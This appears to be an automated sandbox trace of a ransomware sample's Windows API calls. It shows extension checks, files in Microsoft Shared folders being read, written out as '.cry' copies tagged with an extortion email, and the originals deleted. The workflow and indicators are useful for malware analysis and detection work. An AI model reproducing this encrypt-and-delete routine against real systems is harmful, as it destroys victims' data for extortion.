1 [0052.145] lstrlenW (lpString=".bz2") returned 4 [0052.145] lstrcmpiW (lpString1=".bz2", lpString2=".FLT") returned -1 [0052.145] lstrlenW (lpString=".7z") returned 3 [0052.145] lstrcmpiW (lpString1=".7z", lpString2="FLT") returned -1 [0052.145] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\JPEGIM32.FLT") returned 67 [0052.145] lstrlenW (lpString=".dbf") returned 4 [0052.145] lstrcmpiW (lpString1=".dbf", lpString2=".FLT") returned -1 [0052.145] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\JPEGIM32.FLT") returned 67 [0052.145] lstrlenW (lpString=".1cd") returned 4 [0052.145] lstrcmpiW (lpString1=".1cd", lpString2=".FLT") returned -1 [0052.145] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\JPEGIM32.FLT") returned 67 [0052.145] lstrlenW (lpString=".jpg") returned 4 [0052.145] lstrcmpiW (lpString1=".jpg", lpString2=".FLT") returned 1 [0052.145] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\JPEGIM32.FLT") returned 67 [0052.145] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\JPEGIM32.FLT") returned 67 [0052.145] lstrlenW (lpString=".doc") returned 4 [0052.145] lstrcmpiW (lpString1=".doc", lpString2=".FLT") returned -1 [0052.146] lstrlenW (lpString=".docx") returned 5 [0052.146] lstrcmpiW (lpString1=".docx", lpString2="2.FLT") returned -1 [0052.146] lstrlenW (lpString=".pdf") returned 4 [0052.146] lstrcmpiW (lpString1=".pdf", lpString2=".FLT") returned 1 [0052.146] lstrlenW (lpString=".xls") returned 4 [0052.146] lstrcmpiW (lpString1=".xls", lpString2=".FLT") returned 1 [0052.146] lstrlenW (lpString=".xlsx") returned 5 [0052.146] lstrcmpiW (lpString1=".xlsx", lpString2="2.FLT") returned -1 [0052.146] lstrlenW (lpString=".ppt") returned 4 [0052.146] lstrcmpiW (lpString1=".ppt", lpString2=".FLT") returned 1 [0052.146] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\JPEGIM32.FLT") returned 67 [0052.146] lstrlenW (lpString=".zip") returned 4 [0052.146] lstrcmpiW (lpString1=".zip", lpString2=".FLT") returned 1 [0052.146] lstrlenW (lpString=".rar") returned 4 [0052.146] lstrcmpiW (lpString1=".rar", lpString2=".FLT") returned 1 [0052.146] lstrlenW (lpString=".bz2") returned 4 [0052.146] lstrcmpiW (lpString1=".bz2", lpString2=".FLT") returned -1 [0052.146] lstrlenW (lpString=".7z") returned 3 [0052.146] lstrcmpiW (lpString1=".7z", lpString2="FLT") returned -1 [0052.146] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\JPEGIM32.FLT") returned 67 [0052.146] lstrlenW (lpString=".dbf") returned 4 [0052.146] lstrcmpiW (lpString1=".dbf", lpString2=".FLT") returned -1 [0052.146] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\JPEGIM32.FLT") returned 67 [0052.146] lstrlenW (lpString=".1cd") returned 4 [0052.146] lstrcmpiW (lpString1=".1cd", lpString2=".FLT") returned -1 [0052.146] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\JPEGIM32.FLT") returned 67 [0052.146] lstrlenW (lpString=".jpg") returned 4 [0052.146] lstrcmpiW (lpString1=".jpg", lpString2=".FLT") returned 1 [0052.146] lstrcmpiW (lpString1=".WPG", lpString2=".cry") returned 1 [0052.146] lstrlenW (lpString="MS.WPG") returned 6 [0052.146] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\MS.WPG" (normalized: "c:\\program files\\common files\\microsoft shared\\grphflt\\ms.wpg"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x21c [0052.147] GetFileSizeEx (in: hFile=0x21c, lpFileSize=0x2d9ff1c | out: lpFileSize=0x2d9ff1c*=1382) returned 1 [0052.147] CloseHandle (hObject=0x21c) returned 1 [0052.147] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\MS.WPG" (normalized: "c:\\program files\\common files\\microsoft shared\\grphflt\\ms.wpg")) returned 0x20 [0052.147] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\MS.WPG.id-9C354B42.[decryptoperator@qq.com].cry" (normalized: "c:\\program files\\common files\\microsoft shared\\grphflt\\ms.wpg.id-9c354b42.[decryptoperator@qq.com].cry")) returned 0xffffffff [0052.147] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\MS.WPG" (normalized: "c:\\program files\\common files\\microsoft shared\\grphflt\\ms.wpg"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x21c [0052.147] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2d9fec8 | out: lpNewFilePointer=0x0) returned 1 [0052.147] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2d9fec8 | out: lpNewFilePointer=0x0) returned 1 [0052.147] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\MS.WPG.id-9C354B42.[decryptoperator@qq.com].cry" (normalized: "c:\\program files\\common files\\microsoft shared\\grphflt\\ms.wpg.id-9c354b42.[decryptoperator@qq.com].cry"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1c0 [0052.147] GetLastError () returned 0x0 [0052.148] ReadFile (in: hFile=0x21c, lpBuffer=0x3950020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2d9fed4, lpOverlapped=0x0 | out: lpBuffer=0x3950020*, lpNumberOfBytesRead=0x2d9fed4*=0x566, lpOverlapped=0x0) returned 1 [0052.170] WriteFile (in: hFile=0x1c0, lpBuffer=0x3950020*, nNumberOfBytesToWrite=0x570, lpNumberOfBytesWritten=0x2d9fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3950020*, lpNumberOfBytesWritten=0x2d9fc9c*=0x570, lpOverlapped=0x0) returned 1 [0052.171] ReadFile (in: hFile=0x21c, lpBuffer=0x3950020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2d9fed4, lpOverlapped=0x0 | out: lpBuffer=0x3950020*, lpNumberOfBytesRead=0x2d9fed4*=0x0, lpOverlapped=0x0) returned 1 [0052.171] WriteFile (in: hFile=0x1c0, lpBuffer=0x3950020*, nNumberOfBytesToWrite=0xe0, lpNumberOfBytesWritten=0x2d9fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3950020*, lpNumberOfBytesWritten=0x2d9fc9c*=0xe0, lpOverlapped=0x0) returned 1 [0052.171] SetEndOfFile (hFile=0x1c0) returned 1 [0052.171] CloseHandle (hObject=0x1c0) returned 1 [0052.172] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2d9fec8 | out: lpNewFilePointer=0x0) returned 1 [0052.172] SetEndOfFile (hFile=0x21c) returned 1 [0052.172] CloseHandle (hObject=0x21c) returned 1 [0052.172] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\MS.WPG.id-9C354B42.[decryptoperator@qq.com].cry", dwFileAttributes=0x20) returned 1 [0052.173] DeleteFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\MS.WPG" (normalized: "c:\\program files\\common files\\microsoft shared\\grphflt\\ms.wpg")) returned 1 [0052.173] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\MS.WPG") returned 61 [0052.173] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\MS.WPG") returned 61 [0052.173] lstrlenW (lpString=".doc") returned 4 [0052.173] lstrcmpiW (lpString1=".doc", lpString2=".WPG") returned -1 [0052.173] lstrlenW (lpString=".docx") returned 5 [0052.173] lstrcmpiW (lpString1=".docx", lpString2="S.WPG") returned -1 [0052.173] lstrlenW (lpString=".pdf") returned 4 [0052.173] lstrcmpiW (lpString1=".pdf", lpString2=".WPG") returned -1 [0052.173] lstrlenW (lpString=".xls") returned 4 [0052.173] lstrcmpiW (lpString1=".xls", lpString2=".WPG") returned 1 [0052.173] lstrlenW (lpString=".xlsx") returned 5 [0052.173] lstrcmpiW (lpString1=".xlsx", lpString2="S.WPG") returned -1 [0052.173] lstrlenW (lpString=".ppt") returned 4 [0052.173] lstrcmpiW (lpString1=".ppt", lpString2=".WPG") returned -1 [0052.173] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\MS.WPG") returned 61 [0052.173] lstrlenW (lpString=".zip") returned 4 [0052.173] lstrcmpiW (lpString1=".zip", lpString2=".WPG") returned 1 [0052.173] lstrlenW (lpString=".rar") returned 4 [0052.173] lstrcmpiW (lpString1=".rar", lpString2=".WPG") returned -1 [0052.173] lstrlenW (lpString=".bz2") returned 4 [0052.173] lstrcmpiW (lpString1=".bz2", lpString2=".WPG") returned -1 [0052.173] lstrlenW (lpString=".7z") returned 3 [0052.173] lstrcmpiW (lpString1=".7z", lpString2="WPG") returned -1 [0052.173] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\MS.WPG") returned 61 [0052.173] lstrlenW (lpString=".dbf") returned 4 [0052.173] lstrcmpiW (lpString1=".dbf", lpString2=".WPG") returned -1 [0052.173] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\MS.WPG") returned 61 [0052.173] lstrlenW (lpString=".1cd") returned 4 [0052.174] lstrcmpiW (lpString1=".1cd", lpString2=".WPG") returned -1 [0052.174] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\MS.WPG") returned 61 [0052.174] lstrlenW (lpString=".jpg") returned 4 [0052.174] lstrcmpiW (lpString1=".jpg", lpString2=".WPG") returned -1 [0052.174] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\MS.WPG") returned 61 [0052.174] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\MS.WPG") returned 61 [0052.174] lstrlenW (lpString=".doc") returned 4 [0052.174] lstrcmpiW (lpString1=".doc", lpString2=".WPG") returned -1 [0052.174] lstrlenW (lpString=".docx") returned 5 [0052.174] lstrcmpiW (lpString1=".docx", lpString2="S.WPG") returned -1 [0052.174] lstrlenW (lpString=".pdf") returned 4 [0052.174] lstrcmpiW (lpString1=".pdf", lpString2=".WPG") returned -1 [0052.174] lstrlenW (lpString=".xls") returned 4 [0052.174] lstrcmpiW (lpString1=".xls", lpString2=".WPG") returned 1 [0052.174] lstrlenW (lpString=".xlsx") returned 5 [0052.174] lstrcmpiW (lpString1=".xlsx", lpString2="S.WPG") returned -1 [0052.174] lstrlenW (lpString=".ppt") returned 4 [0052.174] lstrcmpiW (lpString1=".ppt", lpString2=".WPG") returned -1 [0052.174] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\MS.WPG") returned 61 [0052.174] lstrlenW (lpString=".zip") returned 4 [0052.174] lstrcmpiW (lpString1=".zip", lpString2=".WPG") returned 1 [0052.174] lstrlenW (lpString=".rar") returned 4 [0052.174] lstrcmpiW (lpString1=".rar", lpString2=".WPG") returned -1 [0052.174] lstrlenW (lpString=".bz2") returned 4 [0052.174] lstrcmpiW (lpString1=".bz2", lpString2=".WPG") returned -1 [0052.174] lstrlenW (lpString=".7z") returned 3 [0052.174] lstrcmpiW (lpString1=".7z", lpString2="WPG") returned -1 [0052.175] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\MS.WPG") returned 61 [0052.175] lstrlenW (lpString=".dbf") returned 4 [0052.175] lstrcmpiW (lpString1=".dbf", lpString2=".WPG") returned -1 [0052.175] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\MS.WPG") returned 61 [0052.175] lstrlenW (lpString=".1cd") returned 4 [0052.175] lstrcmpiW (lpString1=".1cd", lpString2=".WPG") returned -1 [0052.175] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\MS.WPG") returned 61 [0052.175] lstrlenW (lpString=".jpg") returned 4 [0052.175] lstrcmpiW (lpString1=".jpg", lpString2=".WPG") returned -1 [0052.175] lstrcmpiW (lpString1=".FLT", lpString2=".cry") returned 1 [0052.175] lstrlenW (lpString="PICTIM32.FLT") returned 12 [0052.175] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\PICTIM32.FLT" (normalized: "c:\\program files\\common files\\microsoft shared\\grphflt\\pictim32.flt"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x21c [0052.175] GetFileSizeEx (in: hFile=0x21c, lpFileSize=0x2d9ff1c | out: lpFileSize=0x2d9ff1c*=73080) returned 1 [0052.175] CloseHandle (hObject=0x21c) returned 1 [0052.175] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\PICTIM32.FLT" (normalized: "c:\\program files\\common files\\microsoft shared\\grphflt\\pictim32.flt")) returned 0x20 [0052.175] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\PICTIM32.FLT.id-9C354B42.[decryptoperator@qq.com].cry" (normalized: "c:\\program files\\common files\\microsoft shared\\grphflt\\pictim32.flt.id-9c354b42.[decryptoperator@qq.com].cry")) returned 0xffffffff [0052.175] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\PICTIM32.FLT" (normalized: "c:\\program files\\common files\\microsoft shared\\grphflt\\pictim32.flt"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x21c [0052.176] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2d9fec8 | out: lpNewFilePointer=0x0) returned 1 [0052.176] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2d9fec8 | out: lpNewFilePointer=0x0) returned 1 [0052.176] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\PICTIM32.FLT.id-9C354B42.[decryptoperator@qq.com].cry" (normalized: "c:\\program files\\common files\\microsoft shared\\grphflt\\pictim32.flt.id-9c354b42.[decryptoperator@qq.com].cry"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1c0 [0052.176] GetLastError () returned 0x0 [0052.176] ReadFile (in: hFile=0x21c, lpBuffer=0x3950020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2d9fed4, lpOverlapped=0x0 | out: lpBuffer=0x3950020*, lpNumberOfBytesRead=0x2d9fed4*=0x11d78, lpOverlapped=0x0) returned 1 [0052.210] WriteFile (in: hFile=0x1c0, lpBuffer=0x3950020*, nNumberOfBytesToWrite=0x11d80, lpNumberOfBytesWritten=0x2d9fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3950020*, lpNumberOfBytesWritten=0x2d9fc9c*=0x11d80, lpOverlapped=0x0) returned 1 [0052.212] ReadFile (in: hFile=0x21c, lpBuffer=0x3950020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2d9fed4, lpOverlapped=0x0 | out: lpBuffer=0x3950020*, lpNumberOfBytesRead=0x2d9fed4*=0x0, lpOverlapped=0x0) returned 1 [0052.212] WriteFile (in: hFile=0x1c0, lpBuffer=0x3950020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x2d9fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3950020*, lpNumberOfBytesWritten=0x2d9fc9c*=0xec, lpOverlapped=0x0) returned 1 [0052.212] SetEndOfFile (hFile=0x1c0) returned 1 [0052.212] CloseHandle (hObject=0x1c0) returned 1 [0052.212] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2d9fec8 | out: lpNewFilePointer=0x0) returned 1 [0052.212] SetEndOfFile (hFile=0x21c) returned 1 [0052.213] CloseHandle (hObject=0x21c) returned 1 [0052.213] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\PICTIM32.FLT.id-9C354B42.[decryptoperator@qq.com].cry", dwFileAttributes=0x20) returned 1 [0052.214] DeleteFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\PICTIM32.FLT" (normalized: "c:\\program files\\common files\\microsoft shared\\grphflt\\pictim32.flt")) returned 1 [0052.394] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\PICTIM32.FLT") returned 67 [0052.394] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\PICTIM32.FLT") returned 67 [0052.394] lstrlenW (lpString=".doc") returned 4 [0052.394] lstrcmpiW (lpString1=".doc", lpString2=".FLT") returned -1 [0052.394] lstrlenW (lpString=".docx") returned 5 [0052.394] lstrcmpiW (lpString1=".docx", lpString2="2.FLT") returned -1 [0052.394] lstrlenW (lpString=".pdf") returned 4 [0052.394] lstrcmpiW (lpString1=".pdf", lpString2=".FLT") returned 1 [0052.394] lstrlenW (lpString=".xls") returned 4 [0052.394] lstrcmpiW (lpString1=".xls", lpString2=".FLT") returned 1 [0052.395] lstrlenW (lpString=".xlsx") returned 5 [0052.395] lstrcmpiW (lpString1=".xlsx", lpString2="2.FLT") returned -1 [0052.395] lstrlenW (lpString=".ppt") returned 4 [0052.395] lstrcmpiW (lpString1=".ppt", lpString2=".FLT") returned 1 [0052.395] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\PICTIM32.FLT") returned 67 [0052.395] lstrlenW (lpString=".zip") returned 4 [0052.395] lstrcmpiW (lpString1=".zip", lpString2=".FLT") returned 1 [0052.395] lstrlenW (lpString=".rar") returned 4 [0052.395] lstrcmpiW (lpString1=".rar", lpString2=".FLT") returned 1 [0052.396] lstrlenW (lpString=".bz2") returned 4 [0052.396] lstrcmpiW (lpString1=".bz2", lpString2=".FLT") returned -1 [0052.396] lstrlenW (lpString=".7z") returned 3 [0052.396] lstrcmpiW (lpString1=".7z", lpString2="FLT") returned -1 [0052.396] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\PICTIM32.FLT") returned 67 [0052.396] lstrlenW (lpString=".dbf") returned 4 [0052.396] lstrcmpiW (lpString1=".dbf", lpString2=".FLT") returned -1 [0052.396] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\PICTIM32.FLT") returned 67 [0052.396] lstrlenW (lpString=".1cd") returned 4 [0052.396] lstrcmpiW (lpString1=".1cd", lpString2=".FLT") returned -1 [0052.396] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\PICTIM32.FLT") returned 67 [0052.396] lstrlenW (lpString=".jpg") returned 4 [0052.396] lstrcmpiW (lpString1=".jpg", lpString2=".FLT") returned 1 [0052.396] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\PICTIM32.FLT") returned 67 [0052.396] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\PICTIM32.FLT") returned 67 [0052.396] lstrlenW (lpString=".doc") returned 4 [0052.396] lstrcmpiW (lpString1=".doc", lpString2=".FLT") returned -1 [0052.396] lstrlenW (lpString=".docx") returned 5 [0052.396] lstrcmpiW (lpString1=".docx", lpString2="2.FLT") returned -1 [0052.396] lstrlenW (lpString=".pdf") returned 4 [0052.396] lstrcmpiW (lpString1=".pdf", lpString2=".FLT") returned 1 [0052.396] lstrlenW (lpString=".xls") returned 4 [0052.396] lstrcmpiW (lpString1=".xls", lpString2=".FLT") returned 1 [0052.396] lstrlenW (lpString=".xlsx") returned 5 [0052.396] lstrcmpiW (lpString1=".xlsx", lpString2="2.FLT") returned -1 [0052.396] lstrlenW (lpString=".ppt") returned 4 [0052.396] lstrcmpiW (lpString1=".ppt", lpString2=".FLT") returned 1 [0052.396] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\PICTIM32.FLT") returned 67 [0052.396] lstrlenW (lpString=".zip") returned 4 [0052.396] lstrcmpiW (lpString1=".zip", lpString2=".FLT") returned 1 [0052.396] lstrlenW (lpString=".rar") returned 4 [0052.396] lstrcmpiW (lpString1=".rar", lpString2=".FLT") returned 1 [0052.396] lstrlenW (lpString=".bz2") returned 4 [0052.396] lstrcmpiW (lpString1=".bz2", lpString2=".FLT") returned -1 [0052.396] lstrlenW (lpString=".7z") returned 3 [0052.396] lstrcmpiW (lpString1=".7z", lpString2="FLT") returned -1 [0052.396] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\PICTIM32.FLT") returned 67 [0052.397] lstrlenW (lpString=".dbf") returned 4 [0052.397] lstrcmpiW (lpString1=".dbf", lpString2=".FLT") returned -1 [0052.397] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\PICTIM32.FLT") returned 67 [0052.397] lstrlenW (lpString=".1cd") returned 4 [0052.397] lstrcmpiW (lpString1=".1cd", lpString2=".FLT") returned -1 [0052.397] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\PICTIM32.FLT") returned 67 [0052.397] lstrlenW (lpString=".jpg") returned 4 [0052.397] lstrcmpiW (lpString1=".jpg", lpString2=".FLT") returned 1 [0052.397] lstrcmpiW (lpString1=".dll", lpString2=".cry") returned 1 [0052.397] lstrlenW (lpString="hxds.dll") returned 8 [0052.397] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Help\\hxds.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\help\\hxds.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1c4 [0052.442] GetFileSizeEx (in: hFile=0x1c4, lpFileSize=0x2d9ff1c | out: lpFileSize=0x2d9ff1c*=1257984) returned 1 [0052.442] CloseHandle (hObject=0x1c4) returned 1 [0052.442] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Help\\hxds.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\help\\hxds.dll")) returned 0x20 [0052.442] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Help\\hxds.dll.id-9C354B42.[decryptoperator@qq.com].cry" (normalized: "c:\\program files\\common files\\microsoft shared\\help\\hxds.dll.id-9c354b42.[decryptoperator@qq.com].cry")) returned 0xffffffff [0052.442] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Help\\hxds.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\help\\hxds.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1c4 [0052.442] SetFilePointerEx (in: hFile=0x1c4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2d9fec8 | out: lpNewFilePointer=0x0) returned 1 [0052.442] SetFilePointerEx (in: hFile=0x1c4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2d9fec8 | out: lpNewFilePointer=0x0) returned 1 [0052.442] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Help\\hxds.dll.id-9C354B42.[decryptoperator@qq.com].cry" (normalized: "c:\\program files\\common files\\microsoft shared\\help\\hxds.dll.id-9c354b42.[decryptoperator@qq.com].cry"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x228 [0052.443] GetLastError () returned 0x0 [0052.443] ReadFile (in: hFile=0x1c4, lpBuffer=0x3950020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2d9fed4, lpOverlapped=0x0 | out: lpBuffer=0x3950020*, lpNumberOfBytesRead=0x2d9fed4*=0xffff0, lpOverlapped=0x0) returned 1 [0052.526] WriteFile (in: hFile=0x228, lpBuffer=0x3950020*, nNumberOfBytesToWrite=0xffff0, lpNumberOfBytesWritten=0x2d9fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3950020*, lpNumberOfBytesWritten=0x2d9fc9c*=0xffff0, lpOverlapped=0x0) returned 1 [0052.782] ReadFile (in: hFile=0x1c4, lpBuffer=0x3950020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2d9fed4, lpOverlapped=0x0 | out: lpBuffer=0x3950020*, lpNumberOfBytesRead=0x2d9fed4*=0x33210, lpOverlapped=0x0) returned 1 [0052.799] WriteFile (in: hFile=0x228, lpBuffer=0x3950020*, nNumberOfBytesToWrite=0x33220, lpNumberOfBytesWritten=0x2d9fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3950020*, lpNumberOfBytesWritten=0x2d9fc9c*=0x33220, lpOverlapped=0x0) returned 1 [0052.810] ReadFile (in: hFile=0x1c4, lpBuffer=0x3950020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2d9fed4, lpOverlapped=0x0 | out: lpBuffer=0x3950020*, lpNumberOfBytesRead=0x2d9fed4*=0x0, lpOverlapped=0x0) returned 1 [0052.810] WriteFile (in: hFile=0x228, lpBuffer=0x3950020*, nNumberOfBytesToWrite=0xe4, lpNumberOfBytesWritten=0x2d9fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3950020*, lpNumberOfBytesWritten=0x2d9fc9c*=0xe4, lpOverlapped=0x0) returned 1 [0052.811] SetEndOfFile (hFile=0x228) returned 1 [0052.811] CloseHandle (hObject=0x228) returned 1 [0052.811] SetFilePointerEx (in: hFile=0x1c4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2d9fec8 | out: lpNewFilePointer=0x0) returned 1 [0052.811] SetEndOfFile (hFile=0x1c4) returned 1 [0052.813] CloseHandle (hObject=0x1c4) returned 1 [0052.813] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Help\\hxds.dll.id-9C354B42.[decryptoperator@qq.com].cry", dwFileAttributes=0x20) returned 1 [0052.813] DeleteFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Help\\hxds.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\help\\hxds.dll")) returned 1 [0052.814] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Help\\hxds.dll") returned 60 [0052.814] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Help\\hxds.dll") returned 60 [0052.814] lstrlenW (lpString=".doc") returned 4 [0052.814] lstrcmpiW (lpString1=".doc", lpString2=".dll") returned 1 [0052.814] lstrlenW (lpString=".docx") returned 5 [0052.814] lstrcmpiW (lpString1=".docx", lpString2="s.dll") returned -1 [0052.814] lstrlenW (lpString=".pdf") returned 4 [0052.814] lstrcmpiW (lpString1=".pdf", lpString2=".dll") returned 1 [0052.900] lstrlenW (lpString=".xls") returned 4 [0052.900] lstrcmpiW (lpString1=".xls", lpString2=".dll") returned 1 [0052.900] lstrlenW (lpString=".xlsx") returned 5 [0052.900] lstrcmpiW (lpString1=".xlsx", lpString2="s.dll") returned -1 [0052.900] lstrlenW (lpString=".ppt") returned 4 [0052.900] lstrcmpiW (lpString1=".ppt", lpString2=".dll") returned 1 [0052.900] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Help\\hxds.dll") returned 60 [0052.900] lstrlenW (lpString=".zip") returned 4 [0052.900] lstrcmpiW (lpString1=".zip", lpString2=".dll") returned 1 [0052.900] lstrlenW (lpString=".rar") returned 4 [0052.900] lstrcmpiW (lpString1=".rar", lpString2=".dll") returned 1 [0052.900] lstrlenW (lpString=".bz2") returned 4 [0052.900] lstrcmpiW (lpString1=".bz2", lpString2=".dll") returned -1 [0052.900] lstrlenW (lpString=".7z") returned 3 [0052.900] lstrcmpiW (lpString1=".7z", lpString2="dll") returned -1 [0052.900] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Help\\hxds.dll") returned 60 [0052.900] lstrlenW (lpString=".dbf") returned 4 